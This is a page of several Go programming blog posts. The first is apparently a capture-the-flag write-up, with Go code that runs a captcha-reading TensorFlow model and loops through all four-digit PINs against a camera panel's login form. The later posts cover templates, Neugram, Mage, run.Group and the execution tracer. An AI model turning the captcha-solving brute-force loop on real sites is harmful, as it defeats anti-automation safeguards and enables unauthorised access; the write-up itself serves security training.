2017-12-28

This year I helped organize several online security challenges, one of which is Blacklight. Among the things I was asked to do, was creating a POC for a specific challenge, to prove that it’s possible to solve in a reasonable time. That challenge was one I face occasionally in my everyday life, not always with success: break a captcha.

The task that requires breaking the captcha is disabling a security camera, to break into a room, without the security camera capturing your face. Here is how it looked before:

A frame from the camera's capture

The provided information was the saved model used for captcha recognition in the binary ProtoBuf format, and a link to the camera control panel.

An input of a TensorFlow model requires doing some TensorFlow!

A Few words about TensorFlow

TensorFlow is an open-source software for Machine Intelligence, used mainly for machine learning applications such as neural networks.

TensorFlow runs computations involving tensors, and there are many sources to understand what a Tensor is. This article is definitely not a sufficient one, and it only holds the bare minimum to make sense of what the code does. Tensors are awesome and complex mathematical objects, and I encourage you to take the time to learn more about them.

For our purposes, here is the explanation from the TensorFlow website:

A tensor is a generalization of vectors and matrices to potentially higher dimensions. Internally, TensorFlow represents tensors as n-dimensional arrays of base datatypes.

A tensor is defined by the data type of the value(s) it holds, and its shape, which is the number of dimensions, and number of values per dimension.

The flow part in TensorFlow comes to describe that essentially the graph (model) is a set of nodes (operations), and the data (tensors) “flow” through those nodes, undergoing mathematical manipulation. You can look at, and evaluate, any node of the graph.

A Few words about TensorFlow+Go

On the official TensorFlow website, you can find a page dedicated to Go, where it says “TensorFlow provides APIs that are particularly well-suited to loading models created in Python and executing them within a Go application.” It also warns that the TensorFlow Go API is not covered by the TensorFlow API stability guarantees. To the date of this post, it is still working as expected.

When going to the package page, there are 2 warnings: 1) The API defined in this package is not stable and can change without notice. 2) The package path is awkward: github.com/tensorflow/tensorflow/tensorflow/go.

In theory, the Go APIs for TensorFlow are powerful enough to do anything you can do from the Python APIs, including training. Here is an example of training a model in Go using a graph written in Python. In practice, some of tasks, particularly those for model construction are very low level and certainly not as convenient as doing them in Python. For now, it generally makes sense to define the model in TensorFlow for Python, export it, and then use the Go APIs for inference or training that model.[1] So while Go might not be your first choice for working with TensorFlow, they do play nice together when using existing models.

Let’s break into this page

The parts of the page I was facing seemed pretty familiar to your regular captcha-protected form:

  • PIN Code - brute-force
  • Captcha - use the model

So my TO DOs were:

  • 1. Build a captcha reader
  • 2. While not logged in:
    • 2.1 Generate the next PIN code
    • 2.2 Get captcha text for current captcha image
    • 2.3 Try to log in

SavedModel CLI

From the website: SavedModel is the universal serialization format for TensorFlow models.

So our first step would be figuring out the input and output nodes of the prediction workflow. SavedModel CLI is an inspector for doing this. Here’s the command and its output:

$ saved_model_cli show --dir <PATH> --all


MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:

signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['input'] tensor_info:
    dtype: DT_STRING
    shape: unknown_rank
    name: CAPTCHA/input_image_as_bytes:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output'] tensor_info:
    dtype: DT_STRING
    shape: unknown_rank
    name: CAPTCHA/prediction:0
Method name is: tensorflow/serving/predict

What we learn from this are the node names.

Input node: CAPTCHA/input_image_as_bytes,

Output node: CAPTCHA/prediction.

Captcha

Now let’s load the model, using func LoadSavedModel(exportDir string, tags []string, options *SessionOptions) (*SavedModel, error). The function takes 3 arguments: path, tags and seesion options. Explaining tags and options can easily take the entire post and will shift the focus, so for our purpose I used the convention {"serve"}, and provided no session options.

	savedModel, err := tf.LoadSavedModel("./tensorflow_savedmodel_captcha", []string{"serve"}, nil)
	if err != nil {
		log.Println("failed to load model", err)
		return
	}

Then get the captcha from the web page, and run it through the model. First, define the output of an operation in the graph (model+node) and its index.

	feedsOutput := tf.Output{
		Op:    savedModel.Graph.Operation("CAPTCHA/input_image_as_bytes"),
		Index: 0,
	}

Create a new tensor. The input can be a scalar, slices, or array. As we want to predict a captcha, we’ll need 1 dimension with 1 element, of type string.

	feedsTensor, err := tf.NewTensor(string(buf.String()))
	if err != nil {
		log.Fatal(err)
	}

Set a map from the operation we will apply to the input it will be applied on.

	feeds := map[tf.Output]*tf.Tensor{feedsOutput: feedsTensor}

Get the output from the prediction operation into this output struct.

	fetches := []tf.Output{
		{
			Op:    savedModel.Graph.Operation("CAPTCHA/prediction"),
			Index: 0,
		},
	}

Run the data through the graph and receive the output - the captcha prediction.

	captchaText, err := savedModel.Session.Run(feeds, fetches, nil)
	if err != nil {
		log.Fatal(err)
	}
	captchaString := captchaText[0].Value().(string)

Here is how this looks like:

The captcha screenshot

Generate a PIN code

The PIN code is made of 4 digits, so we’ll go over all the combinations. Additionally, in each iteration the saved model is required for the prediction operation, and of course some logs.

for x := 0; x < 10000; x++ {
		logIntoSite(fmt.Sprintf("%0.4d", x), savedModel, *printLogs)
	}

Try to log in

Once all values are there - the current value of the PIN code in the loop and the captcha prediction - let’s POST that request to the login page.

	params := url.Values{}
	params.Set("pin", pinAttempt)
	params.Set("captcha", captchaString)

	res, err := client.PostForm(string(siteUrl+"/disable"), params)
	if err != nil {
		log.Fatal(err)
	}

	defer res.Body.Close()
	buf = new(bytes.Buffer)
	buf.ReadFrom(res.Body)
	response := buf.String()

If the captcha prediction failed, run the prediction again, and retry with the same PIN code.

	if parseResponse(response, pinAttempt, captchaString, printLogs) == badCaptcha {
		logIntoSite(savedModel, printLogs)
	}

The parseResponse function checks and reports whether the website response is a success or one of the failure messages, which I found by manually trying combinations of guessing a PIN code and correct and wrong captcha translations.

func parseResponse(response, pinAttempt, captchaString string, printLogs bool) string {
	message := "something happened"
	if strings.Contains(response, badPIN) {
		message = badPIN
	} else if strings.Contains(response, badCaptcha) {
		message = badCaptcha
	}

	logResponse(printLogs, message, pinAttempt, captchaString, response)
	return message
}

The rest of the code

To complete this code, let’s add everyones favorites: cookies and logging. Generating the captcha starts a new session, and in order to use the predicted captcha in the same session, we will open a cookie jar. Even though it’s the first time I am writing about cookies publicly, I will spare cookie jokes, as part of the Christmas spirit.

	jar, err := cookiejar.New(nil)
	if err != nil {
		log.Fatal(err)
	}
	client := &http.Client{
		Jar: jar,
	}

And here is how it looks when it’s all composed together.

To wrap this up

TensorFlow has many great models which can be used with Go. Here is a great list of those.

Online challenges can be an awesome way to learn, whether it’s coding, security or sports. The combination of putting in practice your knowledge and having a mission creates a fun environment where you can work on improving your skills. Consider joining such a challenge as your new year’s resolution.

Thanks a lot to Ed for reviewing this PR. Also thanks to Asim Ahankar from the TensorFlow team for pointing out it is possible to train models with Go, as updated in [1]. We will collaborate further to make the documentation around this more accessible.

If you want to chat more about this, tweet me, or meet me at Gophercon Iceland!

2017-12-27
It is real struggle to work with a new language, especially if the type doesn’t resemble what you have previously seen. I have been there with Go and lost my interest in the language when it first came out due to the reason I was pretending it is something I already knew. Go is considered as an object-oriented language even though it lacks type hierarchy. It has an unconventional type system.
2017-12-27

Go templates are a powerful method to customize output however you want, whether you’re creating a web page, sending an e-mail, working with Buffalo, Go-Hugo, or just using some CLI such as kubectl.

There’re two packages operating with templates — text/template and html/template. Both provide the same interface, however the html/template package is used to generate HTML output safe against code injection.

In this article we’re going to take a quick look on how to use the package, as well as how to integrate them with your application.

Actions

Before we learn how to implement it, let’s take a look at template’s syntax. Templates are provided to the appropriate functions either as string or as “raw string”. Actions represents the data evaluations, functions or control loops. They’re delimited by {{ }}. Other, non delimited parts are left untouched.

Data evaluations

Usually, when using templates, you’ll bind them to some data structure (e.g. struct) from which you’ll obtain data. To obtain data from a struct, you can use the {{ .FieldName }} action, which will replace it with FieldName value of given struct, on parse time. The struct is given to the Execute function, which we’ll cover later.

There’s also the {{.}} action that you can use to refer to a value of non-struct types.

Conditions

You can also use if loops in templates. For example, you can check if FieldName non-empty, and if it is, print its value: {{if .FieldName}} Value of FieldName is {{ .FieldName }} {{end}}.

else and else if are also supported: {{if .FieldName}} // action {{ else }} // action 2 {{ end }}.

Loops

Using the range action you can loop through a slice. A range actions is defined using the {{range .Member}} ... {{end}} template.

If your slice is a non-struct type, you can refer to the value using the {{ . }} action. In case of structs, you can refer to the value using the {{ .Member }} action, as already explained.

Functions, Pipelines and Variables

Actions have several built-in functions that’re used along with pipelines to additionally parse output. Pipelines are annotated with | and default behavior is sending data from left side to the function on right side.

Functions are used to escape the action’s result. There’re several functions available by default such as, html which returns HTML escaped output, safe against code injection or js which returns JavaScript escaped output.

Using the with action, you can define variables that’re available in that with block: {{ with $x := <^>result-of-some-action<^> }} {{ $x }} {{ end }}.

Throughput the article, we’re going to cover more complex actions, such as reading from an array instead of struct.

Parsing Templates

The three most important and most frequently used functions are:

  • New — allocates new, undefined template,
  • Parse — parses given template string and return parsed template,
  • Execute — applies parsed template to the data structure and writes result to the given writer.

The following code shows above-mentioned functions in the action:

package main

import (
	"os"
	"text/template"
)

type Todo struct {
	Name        string
	Description string
}

func main() {
	td := Todo{"Test templates", "Let's test a template to see the magic."}

  t, err := template.New("todos").Parse("You have a task named \"{{ .Name}}\" with description: \"{{ .Description}}\"")
	if err != nil {
		panic(err)
	}
	err = t.Execute(os.Stdout, td)
	if err != nil {
		panic(err)
	}
}

The result is the following message printed in your terminal:

You have a task named "Test templates" with description: "Let's test a template to see the magic."

You can reuse the same template, without needing to create or parse it again by providing the struct you want to use to the Execute function again:

// code omitted beacuse of brevity
...

tdNew := Todo{"Go", "Contribute to any Go project"}
err = t.Execute(os.Stdout, tdNew)
}

The result is like the previous one, just with new data:

You have a task named "Go" with description: "Contribute to any Go project"

As you can see, templates provide a powerful way to customize textual output. Beside manipulating textual output, you can also manipulate HTML output using the html/template package.

Verifying Templates

template packages provide the Must functions, used to verify that a template is valid during parsing. The Must function provides the same result as if we manually checked for the error, like in the previous example.

This approach saves you typing, but if you encounter an error, your application will panic. For advanced error handling, it’s easier to use above solution instead of Must function.

The Must function takes a template and error as arguments. It’s common to provide New function as an argument to it:

t := template.Must(template.New("todos").Parse("You have task named \"{{ .Name}}\" with description: \"{{ .Description}}\""))

Throughput the article we’re going to use this function so we can omit explicit error checking.

Once we know how what Template interface provides, we can use it in our application. Next section of the article will cover some practical use cases, such as creating web pages, sending e-mails or implementing it with your CLI.

Implementing Templates

In this part of the article we’re going to take a look how can you use the magic of templates. Let’s create a simple HTML page, containing an to-do list.

Creating Web Pages using Templates

The html/template package allows you to provide template file, e.g. in the form of an HTML file, to make implementing both the front-end and back-end easier.

The following data structure represents a To-Do list. The root element has the user’s name and list, which is represented as an array of struct containing the tasks’ name and status.

type entry struct {
  Name string
  Done bool
}

type ToDo struct {
  User string
  List []entry
}

This simple HTML page will be used to display user’s name and its To-Do list. For this example, we’re going to use range action to loop through tasks slice, with action to easier get data from slice and an condition checking is task already done. In case task is done, Yes will be written in the appropriate field, otherwise No will be written.

<!DOCTYPE html>
<html>
  <head>
    <title>Go To-Do list</title>
  </head>
  <body>
    <p>
      To-Do list for user: {{ .User }} 
    </p>
    <table>
      	<tr>
          <td>Task</td>
          <td>Done</td>
    	</tr>
      	{{ with .List }}
			{{ range . }}
      			<tr>
              		<td>{{ .Name }}</td>
              		<td>{{ if .Done }}Yes{{ else }}No{{ end }}</td>
      			</tr>
			{{ end }} 
      	{{ end }}
    </table>
  </body>
</html>

Just like earlier, we’re going to parse the template and then apply it to the struct containing our data. Instead of the Parse function, the ParseFile is going to be used. Also, for code brevity, we’ll write parsed data to standard output (your terminal) instead to an HTTP Writer.

package main

import (
	"html/template"
	"os"
)

type entry struct {
	Name string
	Done bool
}

type ToDo struct {
	User string
	List []entry
}

func main() {
	// Parse data -- omitted for brevity

	// Files are provided as a slice of strings.
	paths := []string{
		"todo.tmpl",
	}

    t := template.Must(template.New("html-tmpl").ParseFiles(paths...))
	err = t.Execute(os.Stdout, todos)
	if err != nil {
		panic(err)
	}
}

This time, we’re using html/template instead of text/template, but as they provide the same interface, we’re using the same functions to parse the template. That output would be same even if you used text/template, but this output is safe against code injection.

This code generates code such as the below one:

<!DOCTYPE html>
<html>
  <head>
    <title>Go To-Do list</title>
  </head>
  <body>
    <p>
      To-Do list for user: gopher 
    </p>
    <table>
      	<tr>
          <td>Task</td>
          <td>Done</td>
    	</tr>
      			<tr>
              		<td>GopherAcademy Article</td>
              		<td>Yes</td>
      			</tr>			
      			<tr>
              		<td>Merge PRs</td>
              		<td>No</td>
      			</tr>
    </table>
  </body>
</html>
Parsing Multiple Files

Sometimes, this approach is not suitable if you have many files, or you’re dynamically adding new ones and removing old ones.

Beside the ParseFiles function, there’s also the ParseGlob function which takes glob as an argument and than parses all files that matches the glob.

// ...
t := template.Must(template.New("html-tmpl").ParseGlob("*.tmpl"))
err = t.Execute(os.Stdout, todos)
if err != nil {
	panic(err)
}
// ...
Use cases
  • You can use this approach to generate a web page that obtains data using Go API.
  • You can generate and send e-mails.
  • You can create wonderful web sites using Go Hugo templating.

Customizing Command’s Output

You can incorporate templates in your CLI allowing users to customize command’s output. This is commonly done by providing flags for inputing templates. For example, Kubernetes CLI—kubectl provides two flags, --template for providing a template as a string and --template-file used to provide a template in the form of a file.

The following snippet parses the template provided via one of the two flags—template and template-file.

package main

import (
	"flag"
	"os"
)

func main() {
  	// data parsing...
  
	var template, templateFile string
	flag.StringVar(&template, "template", "", "a template")
	flag.StringVar(&templateFile, "template-file", "", "a template file path")
	flag.Parse()

	if templateFile != "" {
		path := []string{templateFile}
		t := template.Must(template.New("html-tmpl").ParseFiles(path...))
		err = t.Execute(os.Stdout, todos)
		if err != nil {
			panic(err)
		}
	} else if template != "" {
		path := []string{templateFile}
		t := template.Must(template.New("html-tmpl").Parse(template))
		err = t.Execute(os.Stdout, todos)
		if err != nil {
			panic(err)
		}
	} else {
		// non-template data logic...
	}

}

Similar could be done using spf13/cobra. This code snippet omits data parsing logic because of brevity. Users can use this to customize output using intuitive template language, without need to use tools such as sed, awk or grep.

Conclusion

In this article we showed how to use basic templating functions to manipulate data along with several use cases. This article is meant to be a quick reference to Go’s template packages. You can also check out the official text/template and html/template if you’re interested in more complex use cases.

If you have any questions, feel free to contact me! You can find me as xmudrii on Gophers Slack, Twitter and GitHub.

2017-12-26

Neugram is a scripting language that sticks very close to Go. Go statements are Neugram statements, you can import Go packages, scripts can be compiled to Go programs, and types look just like the equivalent Go types at run time (which means packages built on reflection, like fmt, work as expected). These requirements put a lot of restrictions on the design of Neugram. This post is about one such restriction on methods that I did not discover until I tried to use it without thinking.

Background: Go without declarations

When designing a language for use in a REPL (a read-eval-print-loop like your shell), you want to be able to dive right in and have code executed as quickly as possible. That is, a scripting language should be able to say "Hello, World!" in one reasonable line.

Popular scripting languages like Perl and Python use statements as the topmost grammatical construction. A simple statement can consist of a single expression, like the command to print a string.

Go is different. The topmost grammatical construction in Go is a declaration. Declarations consist of package-wide constants, variables, functions, types and methods. Inside declarations are statements. The statement is in charge of program control flow, and contain some number of expressions. An expression is an actual computation, where we do the work of programming.

The concept of having a layer of declarations above statements is common in programming languages. Both C and Java have declarations. Declarations are useful. The order of top-level declarations in Go does not affect the order of execution of the program. This makes it possible to depend on names defined later in the file (or in an entirely different file in the package) without developing a system of forward declarations or header files.

One of the key changes that makes Neugram a different language from Go is we do not have top-level declarations. Neugram starts with statements. We lose the advantages of declarations in exchange for executing statements quickly

Without declarations, packages are restricted to a single file (to avoid thinking about order of file execution) and referring to names not yet defined is tricky, but the feel of many programs stays the same because in Go most declarations also work as statements. For example:

var V = 4
type T int

Method grammar

The one top-level declaration that we miss in Neugram is the method declaration. In Go you declare a method by writing:

func (t T) String() string {
	return fmt.Sprintf("%d", int(t))
}

Critically, this declaration does not stand on its own. You need another declaration somewhere in your package defining the type T. While type declarations can be made as statements, method declarations cannot. There are several possible arguments for why not, but given the current syntax one is that it would introduce the notion of incomplete types to the run time phase of Go programs. Imagine:

func main() {
	type T int
	var t interface{} = T{}

	_, isReader := t.(io.Reader)
	fmt.Println(isReader) // prints false

	if rand {
		func (t T) Read([]byte) (int, error) {
			return 0, io.EOF
		}
	}

	_, isReader = t.(io.Reader)
	fmt.Println(isReader) // prints ... what?
}

Method declarations in Go break the complete definition of a type out over many top-level declarations. This works in Go because there is no concept of time for declarations, they all happen simultaneously before a program is run. This won’t work in Neugram where all declarations have to be made inside statements that happen during program execution.

Methodik

To resolve this, Neugram introduces a new keyword to define types with all of its methods in a single statement, methodik.

methodik T int {
	func (t) Read([]byte) (int, error) {
		return 0, io.EOF
	}
}

This statement is evaluated in one step. The type T does not exist beforehand, and after the statement is evaluated it exists with all of its methods.

So far so good.

Method closures: You can’t do that in Go

While testing out method declarations, I attempted to reimplement io.LimitReader. The version I came up with didn’t work:

func limit(r io.Reader, n int) io.Reader {
	methodik lr struct{} {
		func (*l) Read(p []byte) (int, error) {
			if n <= 0 {
				return 0, io.EOF
			}
			if len(p) > n {
				p = p[:n]
			}
			rn, err := r.Read(p)
			n -= rn
			return rn, err
		}
	}
	return &lr{}
}

Why not? Using the values r and n in a closure is normal Go programming, but this is something unusual: I am trying to construct a method closure.

An implication of methods only being definable by top-level declaration in Go is that there is no closure equivalent form. There is also no way (presently, issue #16522 may make it possible) to create a method using reflection which would allow closing over variables.

This is not a particularly problematic limitation, we can move the free variables of the closure explicitly into the type being defined to get the same effect:

func limit(r io.Reader, n int) io.Reader {
	methodik lr struct{
		R io.Reader
		N int
	} {
		func (*l) Read(p []byte) (int, error) {
			if l.N <= 0 {
				return 0, io.EOF
			}
			if len(p) > n {
				p = p[:l.N]
			}
			rn, err := l.R.Read(p)
			l.N -= rn
			return rn, err
		}
	}
	return &lr{r, n}
}

Avoiding method closures also avoids some reflection surprises: two different lr types, defined as closing over different values, would probably have to be different types. That means run time creation of new types without the use of the reflect package, which is a category of possibilities I’m glad I don’t have to imagine.

The restriction itself however could be confusing for someone new to Neugram who doesn’t know about the limits of Go underlying it. In particular, consider the interaction with global variables. It is fine for a method defined in Go to refer to globals, and so too in Neugram:

var x = "hello" // a global

methodik obj struct{} {
	func (o) String() string {
		return x // this is fine
	}
}

However if we take this code and try to indent it into a block, the type checker will now have to produce an error, because x is no longer a global variable. This is unfortunate. In Go there is a clear distinction between global (defined by top-level declarations) and non-global variables (defined by statements). In Neugram they look similar, so this is one more thing the programmer has to track themselves.

Surprising expressivity

Accidentally introducing syntax for method closures is a good example of the kind of problem I have spent a lot of time trying to avoid in Neugram. Even the smallest changes to Go result in unexpected ways to write programs. I did not find this particular problem until months after creating the methodik syntax.

2017-12-25

Many Go projects can be built using only Go’s wonderful built-in tooling. However, for many projects, these commands may not sufficient. Maybe you want to use ldflags during the build to embed the commit hash in the binary. Maybe you want to embed some files into the binary. Maybe you want to generate some code. Maybe you want to run a half dozen different linters. That’s where a build tool comes into play.

I used to propose using a normal go file to be run with go run. However, then you’re stuck building out a lot of the CLI handling yourself, which is busy work… no one wants to write another CLI parser for their project, plus error handling, plus handling output etc.

You might consider make, which handles the CLI definition for you, but then you’re stuck with writing Bash. A few months ago, I decided that neither of these build tool options were sufficient, and decided to make a third way. Thus, Mage was born. Mage is a build tool similar to make or rake, but intead of writing bash or ruby, Mage lets you write the logic in Go.

There are many reasons to choose Mage over make. The most important is the language. By definition, the contributors to your Go project already know Go. For many of them, it may be the language they’re most comfortable with. Your build system is just as important as the thing it’s building, so why not make it just as easy to contribute to? Why have a second language in your repo if you can easily avoid it? Not only is bash an esoteric language to start with, make piles even more arcane syntax on top of bash. Now you’re maintaining effectively three different languages in your repo.

One thing I love about Go is how easy it is to make cross platform applications. This is where Mage really shines. Although make is installed by default on Linux and OSX, it is not installed by default on Windows (which, as Stack Overflow notes, is the most prevalent development OS). Even if you install make on Windows, now you have to get bash running, which is non-trivial (yes, you can install the Windows Subsystem for Linux, but now you’re up to a pretty big ask just to build your Go project).

Mage, on the other hand, is a plain old Go application. If you have Go installed (and I presume you do) you can simply go get github.com/magefile/mage. Mage has no dependencies outside the standard library, so you don’t even have to worry about a dependency manager for it. You can also download prebuilt binaries from github, if that’s preferable.

Once Mage is installed, you use Mage much like make in that you write one or more scripts (in this case, normal go files that we call magefiles) which mage then builds and runs for you. A magefile, instead of having a magic name (like Makefile), uses the go build tag //+build mage to indicate that mage should read it. Other than that, there’s nothing spceial abouit magefiles and you can name them whatever you like.

Mage includes all files that have this tag and only files that have this tag in its builds. This has several nice benefits - you can have the code for your build spread across any number of files, and those files will be ignored by the rest of your build commands. In addition, if you have platform-specific build code, you can use go’s build tags to ensure those are included or excluded as per usual. All your existing Go editor integrations, linters, and command line tools work with magefiles just like normal go files, because they are normal go files. Anything you can do with Go, any libraries you want to use, you can use with Mage.

Just like make, Mage uses build targets as CLI commands. For Mage, these targets are simply exported functions that may optionally take a context.Context and may optionally return an error. Any such function is exposed to Mage as a build target. Targets in a magefile are run just like in make

//+build mage

package main

// Creates the binary in the current directory.  It will overwrite any existing
// binary.
func Build() {
    print("building!")
}

// Sends the binary to the server.
func Deploy() error {
    return nil
}

Running mage in the directory with the above file will list the targets:

$ mage
Targets:
  build    Creates the binary in the current directory.
  deploy   Sends the binary to the server

Mage handles errors returned from targets just like you’d hope, printing errors to stderr and exiting with a non-zero exit code. Dependent targets, just like in make, will be run exactly once and starting at the leaves and moving upward through a dynamically generated dependency tree.

Mage has a ton of features - running multiple targets, default targets, target aliases, file targets and sources, shell helpers, and more. However, for this blog post I want to dive more into some of the magic behind how Mage works, not just what it does.

How it Works

When you run mage, the first thing it has to do is figure out what files it should read. It uses the normal go build heuristics (build tags, _platform in filenames, etc) with one little tweak… normally when you build, go grabs all files in a directory without tags. If you specify a tag in the build command it adds any files with that build tag… but it never takes away the files with no build tags. This won’t work for mage, since I wanted it to only include files that had a specific tag. This required some hacking. I ended up copying the entire go/build package into Mage’s repo and inserting some custom code to add the idea of a required tag… which then excludes any files that don’t explicitly specify that tag.

Once that step is done, we have a list of files with the correct build tags. Now, what to do with them? Well, we need to be able to execute the functions inside them. To do that, we need to generate some glue code to call the functions, and build the whole thing into a binary. Since this process can be time consuming the first time it’s run (on the order of 0.3 seconds on my 2017 MBP), we cache the created binary on disk whenever it’s built. Thus, after the first time it’s run, running mage for a project will start instantly like any normal Go binary (on my machine about 0.01s to print out help, for example). To ensure the cached binary exactly matches the code from the magefiles, we hash the input files and some data from the mage binary itself. If a cached version matches the hash (we just use the hash as the filename), we run that, since we know it must have been built using the exact same code.

If there’s no matching binary in the cache, we need to actually do some work. We parse the magefiles using go/types to figure out what our targets are and to look for a few other features (like if there’s a default target and if there’s any aliases). Parsing produces a struct of metadata about the binary, which is then fed into a normal go template which generates the func main() and all the code that produces the help output, the code to determine what target(s) to call, and the error handling.

This generated code is written to a file in the current directory and then it and the magefiles are run through a normal execution of go build to produce the binary, then the temp file is cleaned up.

Now that the glue code and magefiles have been compiled, it’s just a matter of running the binary and passing through the arguments sent to mage (this is the only thing that happens when the binary is cached).

From there, it’s just your go code running, same as always. No surprises, no wacky syntax. The Go we all know and love, working for you and the people on your team.

If you want some examples of magefiles, you can check out ones used by Gnorm, Hugo, and hopefully soon, dep.

Hop on the #mage channel on gopher slack to get all your questions answered, and feel free to take a look at our current issue list and pick up something to hack on.

2017-12-24

I stumbled over this idiom for managing goroutine lifecycles when I was writing OK Log. Since then I’ve found uses for it in nearly every program I’ve written. I thought it’d be nice to share it.

Motivation

My programs tend to have the same structure: they’re built as a set of inter-dependent, concurrent components, each responsible for a distinct bit of behavior. All of these components tend to be modeled in the same way, more or less: whether implemented as structs with methods or free functions, they’re all things that are running: doing stuff, responding to events, changing state, talking to other things, and so on. And when I write programs, in the style of a large func main with explicit dependencies, I generally construct all of the dependencies from the leaves of the dependency tree, gradually working my way up to the higher-order components, and then eventually go the specific things that I want to run.

In this example, I have a state machine, an HTTP server serving an API, some stream processor feeding input to the state machine, and a ctrl-C signal handler.

ctx, cancel := context.WithCancel(context.Background())
defer cancel()

sm := newStateMachine()
go sm.Run(ctx)

api := newAPI(sm)
go http.ListenAndServe(":8080", api)

r := getStreamReader()
go processStream(r, sm)

signalHandler() // maybe we wait for this one to return

We have this setup phase in our func main, where we set up a context. We set up all of the common dependencies, like the logger. And then, we make all of the components, in the order dictated by their dependency relationships. Our state machine has an explicit Run method, which we go to get it started. Our HTTP API needs to have its handler served in its own go routine. Our stream processor is modeled as a function, taking the input stream and state machine as dependencies, which we also go in the background. And our ctrl-C handler also needs to be running, waiting for its signal.

I think this is the best way to structure object graphs and dependencies in Go programs, and I’ve written at length about it before. But there’s some trickiness in the details here. We know that we must never start a goroutine without knowing how it will stop. But how do we actually do this, in a way that’s both intuitive enough for new maintainers to easily grok and extend, and flexible enough to handle the nontrivial use cases we have here?

To me, the complication hinges not on how to start the goroutines, or handle communication between them, but on how to deterministically tear them down. Returning to our example, let’s consider how each of the components might be stopped.

The state machine is clear: since it takes a context.Context, presumably it will return when the context is canceled.

sm := newStateMachine()
go sm.Run(ctx) // stopped via cancel()

But the HTTP server presents a problem: as written, there’s no way to interrupt it. So we need to change it slightly. It turns out http.ListenAndServe is just a small helper function, which combines two things: first binding the listener, and then attaching and running the server. If we do those two steps explicitly ourselves, we get access to the net.Listener, which has a Close method that, when invoked, will trigger the server to return. Or, better still: we can leverage the graceful shutdown functionality added to http.Server in 1.8.

api := newAPI(sm)
server := http.Server{Handler: api}
ln, _ := net.Listen("tcp", ":8080")
server.Serve(ln) // shutdown via server.Shutdown()

In this demonstrative example, we’ll say that the stream processor returns when its stream io.Reader is exhausted. But as written, there’s no way to trigger an e.g. io.EOF on a plain io.Reader. Instead, we’d need to wrap it into an io.ReadCloser, and provide a way to close the stream pre-emptively. Or, perhaps better, the concrete type that implements io.Reader, for example a net.Conn, may also have a Close method that could work.

// r := getStreamReader()
rc := getStreamReadCloser()
go streamProcessor(rc, sm) // stopped via rc.Close()

Finally, the ctrl-C handler also has no way to be interrupted as written. But since it’s our own code, we’re presumably free to modify it to add an interrupt mechanism. I like using a cancel chan for this kind of basic stuff: less surface area than context.Context.

stop := make(chan struct{})
signalHandler(stop) // returns via close(stop) (or ctrl-C)

Look at all the different ways we have to terminate goroutines. I think the only commonality between them is that they’re expressions, or blocks of Go code. And I think anything that manages goroutine lifecycles needs to accommodate this heterogeneity. If we embrance that constraint, and try to design an API around it, what falls out?

run.Group

My guess at an answer is package run, and the run.Group. From the package documentation:

Package run implements an actor-runner with deterministic teardown. It is somewhat similar to package errgroup, except it does not require actor goroutines to understand context semantics. This makes it suitable for use in more circumstances; for example, goroutines which are handling connections from net.Listeners, or scanning input from a closable io.Reader.

With package run and the run.Group, we model each running goroutine as a pair of functions, defined inline. The first function, called the execute function, is launched as a new goroutine. The second function, called the interrupt function, must interrupt the execute function and cause it to return.

Here’s the documentation:

func (g *Group) Add(execute func() error, interrupt func(error))
    Add an actor (function) to the group. Each actor must be pre-emptable by
    an interrupt function. That is, if interrupt is invoked, execute should
    return. Also, it must be safe to call interrupt even after execute has
    returned.

    The first actor (function) to return interrupts all running actors. The
    error is passed to the interrupt functions, and is returned by Run.

func (g *Group) Run() error
    Run all actors (functions) concurrently. When the first actor returns,
    all others are interrupted. Run only returns when all actors have
    exited. Run returns the error returned by the first exiting actor.

And here’s how it looks when we apply it to our example.

var g run.Group // the zero value is useful

sm := newStateMachine()
g.Add(func() error { return sm.Run(ctx) }, func(error) { cancel() })

api := newAPI(sm)
server := http.Server{Handler: api}
ln, _ := net.Listen("tcp", ":8080")
g.Add(func() error { return server.Serve(ln), func(error) { server.Stop(ctx)} })

rc := getStreamReadCloser()
g.Add(func() error { return streamProcessor(rc, sm) }, func(error) { rc.Close() })

stop := make(chan struct{})
g.Add(func() error { return signalHandler(stop) }, func(error) { close(stop) })

log.Print(g.Run())

g.Run blocks until all the actors return. In the normal case, that’ll be when someone hits ctrl-C, triggering the signal handler. If something breaks, say the stream processor, its error will be propegated through. In all cases, the first returned error triggers the interrupt function for all actors. And in this way, we can reliably and coherently ensure that every goroutine that’s Added to the group is stopped, when Run returns.

I designed run.Group to help orchestrate goroutines in func main, but I’ve found several other uses since then. For example, it makes a great alternative to a sync.WaitGroup if you’d otherwise have to construct a bunch of scaffolding. Maybe you’ll find some uses, too.

2017-12-23

Introduction

Ever wondered how are your goroutines being scheduled by the go runtime? Ever tried to understand why adding concurrency to your program has not given it better performance? The go execution tracer can help answer these and other questions to help you diagnose performance issues, e.g, latency, contention and poor parallelization.

The tool is available since go 1.5 and works by instrumenting the go runtime for specific events, such as:

  1. Creation, start and end of goroutines
  2. Events that block/unblock goroutines (syscalls, channels, locks)
  3. Network I/O related events
  4. Syscalls
  5. Garbage collection

All this data is collected by the tracer without any kind of aggregation or sampling. In some busy applications this may result in a large file that can be analyzed afterwards by the go tool trace command.

Go already had the pprof memory and CPU profiler, before the introduction of the execution tracer, so why was it added to the official toolchain? While the CPU profiler does a nice job to telling you what function is spending most CPU time, it does not help you figure out what is preventing a goroutine from running or how are the goroutines being scheduled on the available OS threads. That’s precisely where the tracer really shines. The tracer design doc does a pretty good job explaining the motivations behind the tracer and how it was designed to work.

A tour of Trace

Let’s start with a simple “Hello, world” example for tracing. In this sample, we use the runtime/trace package to start/stop writing the trace data to the standard error output. Tracing output will be written to the standard error output.

package main

import (
	"os"
	"runtime/trace"
)

func main() {
	trace.Start(os.Stderr)
	defer trace.Stop()
	// create new channel of type int
	ch := make(chan int)

	// start new anonymous goroutine
	go func() {
		// send 42 to channel
		ch <- 42
	}()
	// read from channel
	<-ch
}

This example creates an unbuffered channel and initializes a goroutine that will send the number 42 over this channel. The main goroutine blocks until the other goroutines send a value over the channel.

Running this code with go run main.go 2> trace.out sends the tracing output to the file trace.out, which can then be read with: go tool trace trace.out.

Before go 1.8, one needed both the executable binary and the trace data to be able to analyze the trace; for programs compiled with go 1.8 onwards, the trace data contains all the information needed by the go tool trace command.

After running the command, a browser window opens with some options. Each of those opens a different view of the tracer, containing different information about the program’s execution.

Trace

  1. View trace

